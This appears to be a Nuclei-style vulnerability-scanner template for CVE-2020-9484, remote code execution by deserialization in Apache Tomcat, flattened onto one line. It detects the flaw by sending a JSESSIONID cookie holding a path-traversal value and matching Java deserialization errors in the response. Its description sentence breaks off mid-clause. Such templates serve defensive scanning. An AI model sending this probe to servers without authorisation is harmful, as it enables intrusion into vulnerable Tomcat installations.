id: CVE-2020-9484 info: name: Apache Tomcat RCE by deserialization author: dwisiswant0 severity: high description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server tags: cve,cve2020,apache reference: - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html requests: - method: GET headers: Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy" path: - "{{BaseURL}}/index.jsp" matchers-condition: and matchers: - type: status status: - 500 - type: word words: - "Exception" - "ObjectInputStream" - "PersistentManagerBase" condition: and part: body